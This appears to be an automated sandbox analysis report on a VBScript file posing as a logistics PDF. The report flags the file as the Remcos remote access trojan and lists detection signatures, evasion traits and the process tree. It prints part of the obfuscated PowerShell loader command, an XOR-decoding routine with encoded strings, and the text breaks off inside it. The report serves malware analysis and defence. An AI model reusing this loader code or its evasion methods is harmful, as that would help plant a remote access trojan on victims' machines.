Edit tour
Windows
Analysis Report
russelllogistics_PDF98933 laced 2023-06-06 .vbs
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Sigma detected: Remcos
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 9996 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\russe lllogistic s_PDF98933 laced 202 3-06-06 .v bs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - cmd.exe (PID: 10680 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 10764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 7860 cmdline:
cmd /c dir &echo ###R SHELL.EXE# ## MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 10952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 1604 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Loftma = """ FAuJn cPtGi oEnh k oUnStba bkHt aCn n 1P1L M{ B P b p a r a m (C[BS HtTrNiEnAg ] `$ SDo oSn y s )G ;S K`$ C h CiSrBoJm a P=K M'M'A ; WUr iBt Se -aHPo s FtG B`$ C hDiKrUoDmU aP; WPrSi tIe - H o s tB `$ C bh iAr oFm Ca ;J WPrA iKtAeU-MH oSsSt `$ CEh iSrSos mJa ;M R A G`$ Mbe sPo =T TN Fe wU-AOIb Bj eBcGt C bDyAtie [ ]O T(O`$NS o o n yCs . LOegn g StChm / d2 S) ;I S UF o r ( ` $UAPcrtYuC a tZeBdSpB = 0 ;M H`$ AAKcFtSu a tRe dAp -GlAtU M`$ SnoSoRnPy FsS.BLSeCn BgStvh ;I `$CA c tMu artseRdMp B+ =L2D)L{ f `$ GblK o s eHfHoS rNrPa R=B `$FS oPo n LyFsP.DSTu bKs t r i Rn g (K`$T ABcZt uFaC t eMd pC,G 2 )T;U O B l O C G B`$AM eSs o [S`$sA c tMuOa tE e dNpW/ 2C ]O E=S U[ cRoOnMvHeU rPtT]H:k: T o BSyUt eS(M`$RGUl UoUsFeMf o r r at,C C1A6P)h;C U`$SS psa gThBeC = C(P`$RM eP sBo [ `$ A icAt uFaat GeKd pH/U2 ]U E-Nb x oBrG V2V0 F2T)A;G R B`$HMAeAs o [ `$iA c t uBa tNe dSp /D2C] Z H=T b`$S SapKaSgPh eU;S D } Z[ SAt r i n g ]V[I SDySs t eM mL. T e xE t . E nLcS oWd iOnNg ]e: :SA SK CPI IH.LGO e tnSmt rT i n g (I`$ pM e s oB) M;P} `$ I s nOaKdAiM 0s= kEo nF tSaAkStMa n nk1C1S ' E9G9 BL3CB L9 B E A F sA 7DE 4BA ERA 6 AM6 'P; `$ IS sKnDaEdTiS 1U=Hk oPnG t aEk tNa n nF1I1D ' I8S7DAF3 A O9UB 8DAS5 BH9SAS5FA SCBBLECEA4 9PDmA 3TA H4FFE9HFU8 LES4 9AFAA B4MB 9 APB AVCuAiFu8 4 ACB BOE FAG3RBOCPA FF 8 7 ACF TB EUAB2 A T5TAHE BS9 'F;I`$BIF sPn a dMi 2 =TkPo nA t aekBtRaL nRnK1P1T ' U8FDFABF B LE 9NA B 8 AA5 A 9P8 SB ABEBA E B 8 A FCB B9 B 9V' ; D`$ IMsBnF a dHi 3S= k oCnUt aU kCtAa nEnP 1 1 p'K9 9 UBP3 B 9 B CEMAAF AU7 E 4F9 8OB SFSAK4DBTE GA 3NAL7 A FaET4 8 3 SA 4FB ENA CFABF8 A 5 B AR9 9 A CFPBM8IBBC Ai3SA 9KA FLBF9NE 4 u8F2NABB A S4 A EUA 6 AADFU9 8 A fFPA CA' ; S`$ IFs n a dPiI4K=O kToBnUtSa k tBaRnJn 1U1f K'MB 9 BIERB 8L A 3 AL4 An D 'G;S`$UI Ls nAaGd i R5N=Kk o n lt aAkAtBa n n 1 1F S' 8SD A F CBUE 8H7 A 5 ACE BPF DA 6HABF 8 S2TAAB AM4 TAGE AF6 A FD'P;S`$ ITsPnNaSd iB6 = kSoF n t a kYtL aSnMn 1Q1T I' 9 8W9Z ES9Q9 BRAB A F Au9DA 3FA BPAK6N 8S4FA BDA 7PA F EJ6F E A 8O2IA 3FAsEIA F 8 8 Be3B9 9 AM3 A DD EB6 E AL9 A B FSAU8T AD6 AC3TAD 9N' ; `$CI WsCnlaKd i D7 =TkEoLn tSaDkFtJa n nR1 1C ' 9C8SB FK A 4NB EOAN 3 AM7CA F E 6FEUA 8B 7DAUBHAA4C A BOAODAAU FUAnEr' ; `$ I s nTa d il8E=Bk o n t aRk tFaCn nF1 W1Z N'L9F8 SARFSATCCA 6aA F AP9 LBNEAASFSA EU8bETA F RAP6RA F A D A B BWE BACF 'S;R` $SI s nEa dTi 9R=WkQ o nBt aMk tGaKn n 1 1 'B8 3ZA 4 8M7KAPF OAS7EAS5IB S8DBA3D8Y7 SAM5 AMESB FMAD6 A F N' ;B`$BUD n dGeR0 =F koo nFtBaP k t a n nV 1 1I 'P8 7 B 3H8SE A DFNA 6 ANF RAHDhAwB B CESAPF 9 E ABU3SB AAA FS'D; `$P